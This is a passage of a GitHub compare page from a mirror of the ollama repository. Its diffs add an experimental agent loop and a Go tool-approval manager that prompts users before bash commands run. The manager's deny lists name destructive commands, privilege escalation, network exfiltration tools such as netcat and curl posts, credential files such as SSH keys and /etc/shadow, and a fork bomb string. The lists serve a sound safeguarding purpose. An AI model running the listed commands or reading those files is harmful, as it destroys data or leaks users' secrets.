mirror of
https://github.com/ollama/ollama.git
synced 2026-01-16 19:41:24 -05:00
Compare commits
6 Commits
usage
...
parth/agen
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
b1d711f8cc | ||
|
|
301b8547da | ||
|
|
cb72dbce93 | ||
|
|
c3a534c13c | ||
|
|
35d10ba88a | ||
|
|
dd74829c27 |
10
cmd/cmd.go
10
cmd/cmd.go
@@ -45,6 +45,7 @@ import (
|
||||
"github.com/ollama/ollama/types/model"
|
||||
"github.com/ollama/ollama/types/syncmap"
|
||||
"github.com/ollama/ollama/version"
|
||||
xcmd "github.com/ollama/ollama/x/cmd"
|
||||
)
|
||||
|
||||
const ConnectInstructions = "To sign in, navigate to:\n %s\n\n"
|
||||
@@ -517,6 +518,9 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
||||
return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
|
||||
}
|
||||
|
||||
// Check for experimental flag
|
||||
isExperimental, _ := cmd.Flags().GetBool("experimental")
|
||||
|
||||
if interactive {
|
||||
if err := loadOrUnloadModel(cmd, &opts); err != nil {
|
||||
var sErr api.AuthorizationError
|
||||
@@ -543,6 +547,11 @@ func RunHandler(cmd *cobra.Command, args []string) error {
|
||||
}
|
||||
}
|
||||
|
||||
// Use experimental agent loop with
|
||||
if isExperimental {
|
||||
return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive)
|
||||
}
|
||||
|
||||
return generateInteractive(cmd, opts)
|
||||
}
|
||||
return generate(cmd, opts)
|
||||
@@ -1754,6 +1763,7 @@ func NewCLI() *cobra.Command {
|
||||
runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)")
|
||||
runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
|
||||
runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
|
||||
runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
|
||||
|
||||
stopCmd := &cobra.Command{
|
||||
Use: "stop MODEL",
|
||||
|
||||
@@ -40,6 +40,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
|
||||
fmt.Fprintln(os.Stderr, " /bye Exit")
|
||||
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
|
||||
fmt.Fprintln(os.Stderr, " /? shortcuts Help for keyboard shortcuts")
|
||||
|
||||
fmt.Fprintln(os.Stderr, "")
|
||||
fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.")
|
||||
|
||||
|
||||
@@ -30,7 +30,7 @@ func (p *Prompt) placeholder() string {
|
||||
}
|
||||
|
||||
type Terminal struct {
|
||||
outchan chan rune
|
||||
reader *bufio.Reader
|
||||
rawmode bool
|
||||
termios any
|
||||
}
|
||||
@@ -264,36 +264,21 @@ func NewTerminal() (*Terminal, error) {
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
t := &Terminal{
|
||||
outchan: make(chan rune),
|
||||
rawmode: true,
|
||||
termios: termios,
|
||||
if err := UnsetRawMode(fd, termios); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
go t.ioloop()
|
||||
t := &Terminal{
|
||||
reader: bufio.NewReader(os.Stdin),
|
||||
}
|
||||
|
||||
return t, nil
|
||||
}
|
||||
|
||||
func (t *Terminal) ioloop() {
|
||||
buf := bufio.NewReader(os.Stdin)
|
||||
|
||||
for {
|
||||
r, _, err := buf.ReadRune()
|
||||
if err != nil {
|
||||
close(t.outchan)
|
||||
break
|
||||
}
|
||||
t.outchan <- r
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) Read() (rune, error) {
|
||||
r, ok := <-t.outchan
|
||||
if !ok {
|
||||
return 0, io.EOF
|
||||
r, _, err := t.reader.ReadRune()
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
return r, nil
|
||||
}
|
||||
|
||||
953
x/agent/approval.go
Normal file
953
x/agent/approval.go
Normal file
@@ -0,0 +1,953 @@
|
||||
// Package agent provides agent loop orchestration and tool approval.
|
||||
package agent
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"golang.org/x/term"
|
||||
)
|
||||
|
||||
// ApprovalDecision represents the user's decision for a tool execution.
|
||||
type ApprovalDecision int
|
||||
|
||||
const (
|
||||
// ApprovalDeny means the user denied execution.
|
||||
ApprovalDeny ApprovalDecision = iota
|
||||
// ApprovalOnce means execute this one time only.
|
||||
ApprovalOnce
|
||||
// ApprovalAlways means add to session allowlist.
|
||||
ApprovalAlways
|
||||
)
|
||||
|
||||
// ApprovalResult contains the decision and optional deny reason.
|
||||
type ApprovalResult struct {
|
||||
Decision ApprovalDecision
|
||||
DenyReason string
|
||||
}
|
||||
|
||||
// Option labels for the selector (numbered for quick selection)
|
||||
var optionLabels = []string{
|
||||
"1. Execute once",
|
||||
"2. Always allow",
|
||||
"3. Deny",
|
||||
}
|
||||
|
||||
// autoAllowCommands are commands that are always allowed without prompting.
|
||||
// These are zero-risk, read-only commands.
|
||||
var autoAllowCommands = map[string]bool{
|
||||
"pwd": true,
|
||||
"echo": true,
|
||||
"date": true,
|
||||
"whoami": true,
|
||||
"hostname": true,
|
||||
"uname": true,
|
||||
}
|
||||
|
||||
// autoAllowPrefixes are command prefixes that are always allowed.
|
||||
// These are read-only or commonly-needed development commands.
|
||||
var autoAllowPrefixes = []string{
|
||||
// Git read-only
|
||||
"git status", "git log", "git diff", "git branch", "git show",
|
||||
"git remote -v", "git tag", "git stash list",
|
||||
// Package managers - run scripts
|
||||
"npm run", "npm test", "npm start",
|
||||
"bun run", "bun test",
|
||||
"uv run",
|
||||
"yarn run", "yarn test",
|
||||
"pnpm run", "pnpm test",
|
||||
// Package info
|
||||
"go list", "go version", "go env",
|
||||
"npm list", "npm ls", "npm version",
|
||||
"pip list", "pip show",
|
||||
"cargo tree", "cargo version",
|
||||
// Build commands
|
||||
"go build", "go test", "go fmt", "go vet",
|
||||
"make", "cmake",
|
||||
"cargo build", "cargo test", "cargo check",
|
||||
}
|
||||
|
||||
// denyPatterns are dangerous command patterns that are always blocked.
|
||||
var denyPatterns = []string{
|
||||
// Destructive commands
|
||||
"rm -rf", "rm -fr",
|
||||
"mkfs", "dd if=", "dd of=",
|
||||
"shred",
|
||||
"> /dev/", ">/dev/",
|
||||
// Privilege escalation
|
||||
"sudo ", "su ", "doas ",
|
||||
"chmod 777", "chmod -R 777",
|
||||
"chown ", "chgrp ",
|
||||
// Network exfiltration
|
||||
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
|
||||
"wget --post",
|
||||
"nc ", "netcat ",
|
||||
"scp ", "rsync ",
|
||||
// History and credentials
|
||||
"history",
|
||||
".bash_history", ".zsh_history",
|
||||
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
|
||||
".ssh/config",
|
||||
".aws/credentials", ".aws/config",
|
||||
".gnupg/",
|
||||
"/etc/shadow", "/etc/passwd",
|
||||
// Dangerous patterns
|
||||
":(){ :|:& };:", // fork bomb
|
||||
"chmod +s", // setuid
|
||||
"mkfifo",
|
||||
}
|
||||
|
||||
// denyPathPatterns are file patterns that should never be accessed.
|
||||
// These are checked as exact filename matches or path suffixes.
|
||||
var denyPathPatterns = []string{
|
||||
".env",
|
||||
".env.local",
|
||||
".env.production",
|
||||
"credentials.json",
|
||||
"secrets.json",
|
||||
"secrets.yaml",
|
||||
"secrets.yml",
|
||||
".pem",
|
||||
".key",
|
||||
}
|
||||
|
||||
// ApprovalManager manages tool execution approvals.
|
||||
type ApprovalManager struct {
|
||||
allowlist map[string]bool // exact matches
|
||||
prefixes map[string]bool // prefix matches for bash commands (e.g., "cat:tools/")
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewApprovalManager creates a new approval manager.
|
||||
func NewApprovalManager() *ApprovalManager {
|
||||
return &ApprovalManager{
|
||||
allowlist: make(map[string]bool),
|
||||
prefixes: make(map[string]bool),
|
||||
}
|
||||
}
|
||||
|
||||
// IsAutoAllowed checks if a bash command is auto-allowed (no prompt needed).
|
||||
func IsAutoAllowed(command string) bool {
|
||||
command = strings.TrimSpace(command)
|
||||
|
||||
// Check exact command match (first word)
|
||||
fields := strings.Fields(command)
|
||||
if len(fields) > 0 && autoAllowCommands[fields[0]] {
|
||||
return true
|
||||
}
|
||||
|
||||
// Check prefix match
|
||||
for _, prefix := range autoAllowPrefixes {
|
||||
if strings.HasPrefix(command, prefix) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// IsDenied checks if a bash command matches deny patterns.
|
||||
// Returns true and the matched pattern if denied.
|
||||
func IsDenied(command string) (bool, string) {
|
||||
commandLower := strings.ToLower(command)
|
||||
|
||||
// Check deny patterns
|
||||
for _, pattern := range denyPatterns {
|
||||
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||
return true, pattern
|
||||
}
|
||||
}
|
||||
|
||||
// Check deny path patterns
|
||||
for _, pattern := range denyPathPatterns {
|
||||
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||
return true, pattern
|
||||
}
|
||||
}
|
||||
|
||||
return false, ""
|
||||
}
|
||||
|
||||
// FormatDeniedResult returns the tool result message when a command is blocked.
|
||||
func FormatDeniedResult(command string, pattern string) string {
|
||||
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
|
||||
}
|
||||
|
||||
// extractBashPrefix extracts a prefix pattern from a bash command.
|
||||
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
|
||||
// For commands without path args, returns empty string.
|
||||
func extractBashPrefix(command string) string {
|
||||
// Split command by pipes and get the first part
|
||||
parts := strings.Split(command, "|")
|
||||
firstCmd := strings.TrimSpace(parts[0])
|
||||
|
||||
// Split into command and args
|
||||
fields := strings.Fields(firstCmd)
|
||||
if len(fields) < 2 {
|
||||
return ""
|
||||
}
|
||||
|
||||
baseCmd := fields[0]
|
||||
// Common commands that benefit from prefix allowlisting
|
||||
// These are typically safe for read operations on specific directories
|
||||
safeCommands := map[string]bool{
|
||||
"cat": true, "ls": true, "head": true, "tail": true,
|
||||
"less": true, "more": true, "file": true, "wc": true,
|
||||
"grep": true, "find": true, "tree": true, "stat": true,
|
||||
"sed": true,
|
||||
}
|
||||
|
||||
if !safeCommands[baseCmd] {
|
||||
return ""
|
||||
}
|
||||
|
||||
// Find the first path-like argument (must contain / or start with .)
|
||||
// First pass: look for clear paths (containing / or starting with .)
|
||||
for _, arg := range fields[1:] {
|
||||
// Skip flags
|
||||
if strings.HasPrefix(arg, "-") {
|
||||
continue
|
||||
}
|
||||
// Skip numeric arguments (e.g., "head -n 100")
|
||||
if isNumeric(arg) {
|
||||
continue
|
||||
}
|
||||
// Only process if it looks like a path (contains / or starts with .)
|
||||
if !strings.Contains(arg, "/") && !strings.HasPrefix(arg, ".") {
|
||||
continue
|
||||
}
|
||||
// If arg ends with /, it's a directory - use it directly
|
||||
if strings.HasSuffix(arg, "/") {
|
||||
return fmt.Sprintf("%s:%s", baseCmd, arg)
|
||||
}
|
||||
// Get the directory part of a file path
|
||||
dir := filepath.Dir(arg)
|
||||
if dir == "." {
|
||||
// Path is just a directory like "tools" or "src" (no trailing /)
|
||||
return fmt.Sprintf("%s:%s/", baseCmd, arg)
|
||||
}
|
||||
return fmt.Sprintf("%s:%s/", baseCmd, dir)
|
||||
}
|
||||
|
||||
// Second pass: if no clear path found, use the first non-flag argument as a filename
|
||||
for _, arg := range fields[1:] {
|
||||
if strings.HasPrefix(arg, "-") {
|
||||
continue
|
||||
}
|
||||
if isNumeric(arg) {
|
||||
continue
|
||||
}
|
||||
// Treat as filename in current dir
|
||||
return fmt.Sprintf("%s:./", baseCmd)
|
||||
}
|
||||
|
||||
return ""
|
||||
}
|
||||
|
||||
// isNumeric checks if a string is a numeric value
|
||||
func isNumeric(s string) bool {
|
||||
for _, c := range s {
|
||||
if c < '0' || c > '9' {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return len(s) > 0
|
||||
}
|
||||
|
||||
// isCommandOutsideCwd checks if a bash command targets paths outside the current working directory.
|
||||
// Returns true if any path argument would access files outside cwd.
|
||||
func isCommandOutsideCwd(command string) bool {
|
||||
cwd, err := os.Getwd()
|
||||
if err != nil {
|
||||
return false // Can't determine, assume safe
|
||||
}
|
||||
|
||||
// Split command by pipes and semicolons to check all parts
|
||||
parts := strings.FieldsFunc(command, func(r rune) bool {
|
||||
return r == '|' || r == ';' || r == '&'
|
||||
})
|
||||
|
||||
for _, part := range parts {
|
||||
part = strings.TrimSpace(part)
|
||||
fields := strings.Fields(part)
|
||||
if len(fields) == 0 {
|
||||
continue
|
||||
}
|
||||
|
||||
// Check each argument that looks like a path
|
||||
for _, arg := range fields[1:] {
|
||||
// Skip flags
|
||||
if strings.HasPrefix(arg, "-") {
|
||||
continue
|
||||
}
|
||||
|
||||
// Treat POSIX-style absolute paths as outside cwd on all platforms.
|
||||
if strings.HasPrefix(arg, "/") || strings.HasPrefix(arg, "\\") {
|
||||
return true
|
||||
}
|
||||
|
||||
// Check for absolute paths outside cwd
|
||||
if filepath.IsAbs(arg) {
|
||||
absPath := filepath.Clean(arg)
|
||||
if !strings.HasPrefix(absPath, cwd) {
|
||||
return true
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// Check for relative paths that escape cwd (e.g., ../foo, /etc/passwd)
|
||||
if strings.HasPrefix(arg, "..") {
|
||||
// Resolve the path relative to cwd
|
||||
absPath := filepath.Join(cwd, arg)
|
||||
absPath = filepath.Clean(absPath)
|
||||
if !strings.HasPrefix(absPath, cwd) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
// Check for home directory expansion
|
||||
if strings.HasPrefix(arg, "~") {
|
||||
home, err := os.UserHomeDir()
|
||||
if err == nil && !strings.HasPrefix(home, cwd) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// AllowlistKey generates the key for exact allowlist lookup.
|
||||
func AllowlistKey(toolName string, args map[string]any) string {
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
return fmt.Sprintf("bash:%s", cmd)
|
||||
}
|
||||
}
|
||||
return toolName
|
||||
}
|
||||
|
||||
// IsAllowed checks if a tool/command is allowed (exact match or prefix match).
|
||||
func (a *ApprovalManager) IsAllowed(toolName string, args map[string]any) bool {
|
||||
a.mu.RLock()
|
||||
defer a.mu.RUnlock()
|
||||
|
||||
// Check exact match first
|
||||
key := AllowlistKey(toolName, args)
|
||||
if a.allowlist[key] {
|
||||
return true
|
||||
}
|
||||
|
||||
// For bash commands, check prefix matches
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
prefix := extractBashPrefix(cmd)
|
||||
if prefix != "" && a.prefixes[prefix] {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check if tool itself is allowed (non-bash)
|
||||
if toolName != "bash" && a.allowlist[toolName] {
|
||||
return true
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// AddToAllowlist adds a tool/command to the session allowlist.
|
||||
// For bash commands, it adds the prefix pattern instead of exact command.
|
||||
func (a *ApprovalManager) AddToAllowlist(toolName string, args map[string]any) {
|
||||
a.mu.Lock()
|
||||
defer a.mu.Unlock()
|
||||
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
prefix := extractBashPrefix(cmd)
|
||||
if prefix != "" {
|
||||
a.prefixes[prefix] = true
|
||||
return
|
||||
}
|
||||
// Fall back to exact match if no prefix extracted
|
||||
a.allowlist[fmt.Sprintf("bash:%s", cmd)] = true
|
||||
return
|
||||
}
|
||||
}
|
||||
a.allowlist[toolName] = true
|
||||
}
|
||||
|
||||
// RequestApproval prompts the user for approval to execute a tool.
|
||||
// Returns the decision and optional deny reason.
|
||||
func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any) (ApprovalResult, error) {
|
||||
// Format tool info for display
|
||||
toolDisplay := formatToolDisplay(toolName, args)
|
||||
|
||||
// Enter raw mode for interactive selection
|
||||
fd := int(os.Stdin.Fd())
|
||||
oldState, err := term.MakeRaw(fd)
|
||||
if err != nil {
|
||||
// Fallback to simple input if terminal control fails
|
||||
return a.fallbackApproval(toolDisplay)
|
||||
}
|
||||
|
||||
// Flush any pending stdin input before starting selector
|
||||
// This prevents buffered input from causing double-press issues
|
||||
flushStdin(fd)
|
||||
|
||||
// Check if bash command targets paths outside cwd
|
||||
isWarning := false
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
isWarning = isCommandOutsideCwd(cmd)
|
||||
}
|
||||
}
|
||||
|
||||
// Run interactive selector
|
||||
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning)
|
||||
if err != nil {
|
||||
term.Restore(fd, oldState)
|
||||
return ApprovalResult{Decision: ApprovalDeny}, err
|
||||
}
|
||||
|
||||
// Restore terminal
|
||||
term.Restore(fd, oldState)
|
||||
|
||||
// Map selection to decision
|
||||
switch selected {
|
||||
case -1: // Ctrl+C cancelled
|
||||
return ApprovalResult{Decision: ApprovalDeny, DenyReason: "cancelled"}, nil
|
||||
case 0:
|
||||
return ApprovalResult{Decision: ApprovalOnce}, nil
|
||||
case 1:
|
||||
return ApprovalResult{Decision: ApprovalAlways}, nil
|
||||
default:
|
||||
return ApprovalResult{Decision: ApprovalDeny, DenyReason: denyReason}, nil
|
||||
}
|
||||
}
|
||||
|
||||
// formatToolDisplay creates the display string for a tool call.
|
||||
func formatToolDisplay(toolName string, args map[string]any) string {
|
||||
var sb strings.Builder
|
||||
|
||||
// For bash, show command directly
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
|
||||
sb.WriteString(fmt.Sprintf("Command: %s", cmd))
|
||||
return sb.String()
|
||||
}
|
||||
}
|
||||
|
||||
// For web search, show query
|
||||
if toolName == "web_search" {
|
||||
if query, ok := args["query"].(string); ok {
|
||||
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
|
||||
sb.WriteString(fmt.Sprintf("Query: %s", query))
|
||||
return sb.String()
|
||||
}
|
||||
}
|
||||
|
||||
// Generic display
|
||||
sb.WriteString(fmt.Sprintf("Tool: %s", toolName))
|
||||
if len(args) > 0 {
|
||||
sb.WriteString("\nArguments: ")
|
||||
first := true
|
||||
for k, v := range args {
|
||||
if !first {
|
||||
sb.WriteString(", ")
|
||||
}
|
||||
sb.WriteString(fmt.Sprintf("%s=%v", k, v))
|
||||
first = false
|
||||
}
|
||||
}
|
||||
return sb.String()
|
||||
}
|
||||
|
||||
// selectorState holds the state for the interactive selector
|
||||
type selectorState struct {
|
||||
toolDisplay string
|
||||
selected int
|
||||
totalLines int
|
||||
termWidth int
|
||||
termHeight int
|
||||
boxWidth int
|
||||
innerWidth int
|
||||
denyReason string // deny reason (always visible in box)
|
||||
isWarning bool // true if command targets paths outside cwd (red box)
|
||||
}
|
||||
|
||||
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
|
||||
// If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd.
|
||||
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) {
|
||||
state := &selectorState{
|
||||
toolDisplay: toolDisplay,
|
||||
selected: 0,
|
||||
isWarning: isWarning,
|
||||
}
|
||||
|
||||
// Get terminal size
|
||||
state.termWidth, state.termHeight, _ = term.GetSize(fd)
|
||||
if state.termWidth < 20 {
|
||||
state.termWidth = 80 // fallback
|
||||
}
|
||||
|
||||
// Calculate box width: 90% of terminal, min 24, max 60
|
||||
state.boxWidth = (state.termWidth * 90) / 100
|
||||
if state.boxWidth > 60 {
|
||||
state.boxWidth = 60
|
||||
}
|
||||
if state.boxWidth < 24 {
|
||||
state.boxWidth = 24
|
||||
}
|
||||
// Ensure box fits in terminal
|
||||
if state.boxWidth > state.termWidth-1 {
|
||||
state.boxWidth = state.termWidth - 1
|
||||
}
|
||||
state.innerWidth = state.boxWidth - 4 // account for "│ " and " │"
|
||||
|
||||
// Calculate total lines (will be updated by render)
|
||||
state.totalLines = calculateTotalLines(state)
|
||||
|
||||
// Hide cursor during selection (show when in deny mode)
|
||||
fmt.Fprint(os.Stderr, "\033[?25l")
|
||||
defer fmt.Fprint(os.Stderr, "\033[?25h") // Show cursor when done
|
||||
|
||||
// Initial render
|
||||
renderSelectorBox(state)
|
||||
|
||||
numOptions := len(optionLabels)
|
||||
|
||||
for {
|
||||
// Read input
|
||||
buf := make([]byte, 8)
|
||||
n, err := os.Stdin.Read(buf)
|
||||
if err != nil {
|
||||
clearSelectorBox(state)
|
||||
return 2, "", err
|
||||
}
|
||||
|
||||
// Process input byte by byte
|
||||
for i := 0; i < n; i++ {
|
||||
ch := buf[i]
|
||||
|
||||
// Check for escape sequences (arrow keys)
|
||||
if ch == 27 && i+2 < n && buf[i+1] == '[' {
|
||||
oldSelected := state.selected
|
||||
switch buf[i+2] {
|
||||
case 'A': // Up arrow
|
||||
if state.selected > 0 {
|
||||
state.selected--
|
||||
}
|
||||
case 'B': // Down arrow
|
||||
if state.selected < numOptions-1 {
|
||||
state.selected++
|
||||
}
|
||||
}
|
||||
if oldSelected != state.selected {
|
||||
updateSelectorOptions(state)
|
||||
}
|
||||
i += 2 // Skip the rest of escape sequence
|
||||
continue
|
||||
}
|
||||
|
||||
switch {
|
||||
// Ctrl+C - cancel
|
||||
case ch == 3:
|
||||
clearSelectorBox(state)
|
||||
return -1, "", nil // -1 indicates cancelled
|
||||
|
||||
// Enter key - confirm selection
|
||||
case ch == 13:
|
||||
clearSelectorBox(state)
|
||||
if state.selected == 2 { // Deny
|
||||
return 2, state.denyReason, nil
|
||||
}
|
||||
return state.selected, "", nil
|
||||
|
||||
// Number keys 1-3 for quick select
|
||||
case ch >= '1' && ch <= '3':
|
||||
selected := int(ch - '1')
|
||||
clearSelectorBox(state)
|
||||
if selected == 2 { // Deny
|
||||
return 2, state.denyReason, nil
|
||||
}
|
||||
return selected, "", nil
|
||||
|
||||
// Backspace - delete from reason (UTF-8 safe)
|
||||
case ch == 127 || ch == 8:
|
||||
if len(state.denyReason) > 0 {
|
||||
runes := []rune(state.denyReason)
|
||||
state.denyReason = string(runes[:len(runes)-1])
|
||||
updateReasonInput(state)
|
||||
}
|
||||
|
||||
// Escape - clear reason
|
||||
case ch == 27:
|
||||
if len(state.denyReason) > 0 {
|
||||
state.denyReason = ""
|
||||
updateReasonInput(state)
|
||||
}
|
||||
|
||||
// Printable ASCII (except 1-3 handled above) - type into reason
|
||||
case ch >= 32 && ch < 127:
|
||||
maxLen := state.innerWidth - 2
|
||||
if maxLen < 10 {
|
||||
maxLen = 10
|
||||
}
|
||||
if len(state.denyReason) < maxLen {
|
||||
state.denyReason += string(ch)
|
||||
// Auto-select Deny option when user starts typing
|
||||
if state.selected != 2 {
|
||||
state.selected = 2
|
||||
updateSelectorOptions(state)
|
||||
} else {
|
||||
updateReasonInput(state)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// wrapText wraps text to fit within maxWidth, returning lines
|
||||
func wrapText(text string, maxWidth int) []string {
|
||||
if maxWidth < 5 {
|
||||
maxWidth = 5
|
||||
}
|
||||
var lines []string
|
||||
for _, line := range strings.Split(text, "\n") {
|
||||
if len(line) <= maxWidth {
|
||||
lines = append(lines, line)
|
||||
continue
|
||||
}
|
||||
// Wrap long lines
|
||||
for len(line) > maxWidth {
|
||||
// Try to break at space
|
||||
breakAt := maxWidth
|
||||
for i := maxWidth; i > maxWidth/2; i-- {
|
||||
if i < len(line) && line[i] == ' ' {
|
||||
breakAt = i
|
||||
break
|
||||
}
|
||||
}
|
||||
lines = append(lines, line[:breakAt])
|
||||
line = strings.TrimLeft(line[breakAt:], " ")
|
||||
}
|
||||
if len(line) > 0 {
|
||||
lines = append(lines, line)
|
||||
}
|
||||
}
|
||||
return lines
|
||||
}
|
||||
|
||||
// getHintLines returns the hint text wrapped to terminal width
|
||||
func getHintLines(state *selectorState) []string {
|
||||
hint := "↑/↓ navigate, Enter confirm, 1-3 quick, Ctrl+C cancel"
|
||||
if state.termWidth >= len(hint)+1 {
|
||||
return []string{hint}
|
||||
}
|
||||
// Wrap hint to multiple lines
|
||||
return wrapText(hint, state.termWidth-1)
|
||||
}
|
||||
|
||||
// calculateTotalLines calculates how many lines the selector will use
|
||||
func calculateTotalLines(state *selectorState) int {
|
||||
toolLines := wrapText(state.toolDisplay, state.innerWidth)
|
||||
hintLines := getHintLines(state)
|
||||
// top border + (warning line if applicable) + tool lines + separator + options + bottom border + hint lines
|
||||
warningLines := 0
|
||||
if state.isWarning {
|
||||
warningLines = 1
|
||||
}
|
||||
return 1 + warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines)
|
||||
}
|
||||
|
||||
// renderSelectorBox renders the complete selector box
|
||||
func renderSelectorBox(state *selectorState) {
|
||||
toolLines := wrapText(state.toolDisplay, state.innerWidth)
|
||||
hintLines := getHintLines(state)
|
||||
|
||||
// Use red for warning (outside cwd), cyan for normal
|
||||
boxColor := "\033[36m" // cyan
|
||||
if state.isWarning {
|
||||
boxColor = "\033[91m" // bright red
|
||||
}
|
||||
|
||||
// Draw box top
|
||||
fmt.Fprintf(os.Stderr, "%s┌%s┐\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
|
||||
// Draw warning line if needed (inside the box)
|
||||
if state.isWarning {
|
||||
warning := "!! OUTSIDE PROJECT !!"
|
||||
padding := (state.innerWidth - len(warning)) / 2
|
||||
if padding < 0 {
|
||||
padding = 0
|
||||
}
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %s%s%s %s│\033[0m\033[K\r\n", boxColor,
|
||||
strings.Repeat(" ", padding), warning, strings.Repeat(" ", state.innerWidth-len(warning)-padding), boxColor)
|
||||
}
|
||||
|
||||
// Draw tool info
|
||||
for _, line := range toolLines {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth, line, boxColor)
|
||||
}
|
||||
|
||||
// Draw separator
|
||||
fmt.Fprintf(os.Stderr, "%s├%s┤\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
|
||||
// Draw options with numbers (Deny option includes reason input)
|
||||
for i, label := range optionLabels {
|
||||
if i == 2 { // Deny option - show with reason input beside it
|
||||
denyLabel := "3. Deny: "
|
||||
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||
if availableWidth < 5 {
|
||||
availableWidth = 5
|
||||
}
|
||||
inputDisplay := state.denyReason
|
||||
if len(inputDisplay) > availableWidth {
|
||||
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
}
|
||||
} else {
|
||||
displayLabel := label
|
||||
if len(displayLabel) > state.innerWidth-2 {
|
||||
displayLabel = displayLabel[:state.innerWidth-5] + "..."
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Draw box bottom
|
||||
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
|
||||
// Draw hint (may be multiple lines)
|
||||
for i, line := range hintLines {
|
||||
if i == len(hintLines)-1 {
|
||||
// Last line - no newline
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// updateSelectorOptions updates just the options portion of the selector
|
||||
func updateSelectorOptions(state *selectorState) {
|
||||
hintLines := getHintLines(state)
|
||||
|
||||
// Use red for warning (outside cwd), cyan for normal
|
||||
boxColor := "\033[36m" // cyan
|
||||
if state.isWarning {
|
||||
boxColor = "\033[91m" // bright red
|
||||
}
|
||||
|
||||
// Move up to the first option line
|
||||
// Cursor is at end of last hint line, need to go up:
|
||||
// (hint lines - 1) + 1 (bottom border) + numOptions
|
||||
linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
|
||||
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
|
||||
|
||||
// Redraw options (Deny option includes reason input)
|
||||
for i, label := range optionLabels {
|
||||
if i == 2 { // Deny option
|
||||
denyLabel := "3. Deny: "
|
||||
